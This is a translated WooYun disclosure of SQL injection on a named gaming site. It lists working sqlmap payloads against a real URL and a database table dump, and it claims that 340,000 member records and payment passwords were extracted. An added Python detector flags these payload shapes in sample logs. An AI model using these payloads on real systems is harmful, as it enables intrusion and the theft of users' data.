
Vulnerability summary

Defect ID: wooyun-2015-0120310

Title: SQL injection on the 游戏族 main site leaks 300,000 member records and payment passwords

Vendor: 游戏族

Author: 路人甲

Submitted: 2015-06-15 11:23

Fix time: 2015-07-30 11:24

Disclosed: 2015-07-30 11:24

Type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: Vendor could not be reached, or vendor actively ignored the report

Source: http://www.wooyun.org. For questions or assistance, contact [email protected]



Vulnerability details

Disclosure status:

2015-06-15: Actively contacting the vendor and waiting for them to claim the report; details not disclosed publicly
2015-07-30: Vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

SQL injection on the 游戏族 main site leaks 300,000 member records and payment passwords

Detailed description:

http://www.zugame.com/xsk/?gid=249


[Screenshot: 1.png]

28 databases:

[Screenshot: 2.png]

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: gid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: gid=249 AND 4954=4954
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: gid=249 AND 2415=CONVERT(INT,(SELECT CHAR(113)+CHAR(101)+CHAR(112)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (2415=2415) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(105)+CHAR(110)+CHAR(113)))
Type: UNION query
Title: Generic UNION query (NULL) - 2 columns
Payload: gid=-8823 UNION ALL SELECT CHAR(113)+CHAR(101)+CHAR(112)+CHAR(113)+CHAR(113)+CHAR(122)+CHAR(70)+CHAR(83)+CHAR(72)+CHAR(117)+CHAR(72)+CHAR(122)+CHAR(85)+CHAR(118)+CHAR(111)+CHAR(113)+CHAR(106)+CHAR(105)+CHAR(110)+CHAR(113),NULL--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query)
Payload: gid=-8764 OR 7099=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)
Type: inline query
Title: Microsoft SQL Server/Sybase inline queries
Payload: gid=(SELECT CHAR(113)+CHAR(101)+CHAR(112)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (8403=8403) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(105)+CHAR(110)+CHAR(113))
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
Database: AccDB
[54 tables]
+-----------------------+
| Account_tmp |
| CPS_Binding |
| D99_Tmp |
| Forum |
| GOpenList |
| GameList |
| Gllj |
| GuildLink |
| GuildUser |
| HFForum |
| LZCQ |
| New |
| PhoneBinding |
| SQL_Dir |
| SQL_Path |
| Settlement |
| ShouChong |
| T_Dict_AlignIllegal |
| T_Dict_AreaList |
| T_Dict_AuthTypeDefine |
| T_Dict_DefaultFace |
| T_Dict_GameType |
| T_Dict_IPData |
| T_Dict_IllegalWord |
| T_Dict_JobList |
| T_Dict_PartnerID |
| T_Dict_PartnerID |
| T_Dict_Question |
| T_FindPWD |
| T_IDCard |
| T_Partner_User |
| T_PhoneAuthByPwdReset |
| T_Queen_User |
| T_ReturnValue |
| T_SecretCard_Del |
| T_SecretCard_Del |
| T_UserDetails |
| T_UserGameInfo |
| T_UserKey |
| T_UserLoginError |
| T_UserOtherInfo |
| T_UserPayPWD |
| T_UserUpdEmailPush |
| T_Validate_Email |
| T_Validate_IDCardLog |
| T_Validate_IDCardLog |
| T_Validate_Moblie |
| T_ZCEMailSendHisory |
| T_ZCVipUser |
| XinShouKa |
| libao |
| pangolin_test_table |
| sccharge |
| shangcheng |
+-----------------------+
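An added example (not from the original report or from the vendor): Python detection logic that classifies requests to the /xsk/ endpoint by the sqlmap technique shapes listed above, run over constructed IIS-style log lines. It assumes that a legitimate gid is a plain integer, as the unquoted numeric context of the payloads above suggests; the log lines and their field layout are made up for the example.

```python
import re
from urllib.parse import parse_qs

# Constructed IIS W3C-style log lines (not from the report): date, time,
# method, cs-uri-stem, cs-uri-query, status. The queries are URL-encoded
# forms of the sqlmap payload shapes listed above, plus one benign request.
SAMPLE_LOG = """\
2015-06-15 03:21:07 GET /xsk/ gid=249 200
2015-06-15 03:21:09 GET /xsk/ gid=249+AND+4954%3D4954 200
2015-06-15 03:21:10 GET /xsk/ gid=249+AND+2415%3DCONVERT(INT%2C(SELECT+CHAR(113)%2BCHAR(101))) 500
2015-06-15 03:21:11 GET /xsk/ gid=-8823+UNION+ALL+SELECT+CHAR(113)%2BCHAR(101)%2CNULL-- 200
2015-06-15 03:21:12 GET /xsk/ gid=-8764+OR+7099%3D(SELECT+COUNT(*)+FROM+sysusers+AS+sys1%2Csysusers+AS+sys2) 200
2015-06-15 03:21:13 GET /xsk/ gid=(SELECT+CHAR(113)%2BCHAR(101)) 200
"""

# One signature per technique sqlmap reported, in the order it listed them.
SIGNATURES = [
    ("boolean-based blind", re.compile(r"\b(AND|OR)\s+\d+\s*=\s*\d+\b", re.I)),
    ("error-based", re.compile(r"\bCONVERT\s*\(\s*INT\s*,", re.I)),
    ("UNION query", re.compile(r"\bUNION\s+(ALL\s+)?SELECT\b", re.I)),
    ("time-based blind (heavy query)", re.compile(r"\bsysusers\s+AS\s+sys\d", re.I)),
    ("inline query", re.compile(r"^\s*\(\s*SELECT\b", re.I)),
]

def classify_gid(raw_query):
    """Return (decoded gid, verdict) for one cs-uri-query field.
    Assumption: a legitimate gid is a plain integer; anything else is
    flagged and labelled with the first technique signature it matches."""
    params = parse_qs(raw_query, keep_blank_values=True)
    if "gid" not in params:
        return None, "no gid"
    gid = params["gid"][0]          # parse_qs already URL-decodes the value
    if re.fullmatch(r"-?\d+", gid):
        return gid, "ok"
    for name, pattern in SIGNATURES:
        if pattern.search(gid):
            return gid, "sqli: " + name
    return gid, "sqli: unclassified"

def scan_iis_log(text):
    """Return [(timestamp, verdict)] for every /xsk/ request whose gid is not a plain integer."""
    findings = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 6 or fields[3] != "/xsk/":
            continue            # skip malformed lines and other endpoints
        _, verdict = classify_gid(fields[4])
        if verdict.startswith("sqli"):
            findings.append((fields[0] + " " + fields[1], verdict))
    return findings
```

Signature order matters: the error-based and heavy-query payloads also contain AND/OR, but the boolean signature requires digits on both sides of the comparison, so they fall through to their own labels.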

Proof of vulnerability:

340,000 member records:

[Screenshot: 3.png]

[Screenshot: 4.png]

340,000 payment passwords:

[Screenshot: 5.png]

[Screenshot: 6.png]

Fix recommendation:

Copyright notice: when reposting, credit the source 路人甲@乌云


Vulnerability response

Vendor response:

Vendor could not be reached, or vendor actively refused

Vulnerability Rank: 15 (WooYun assessment)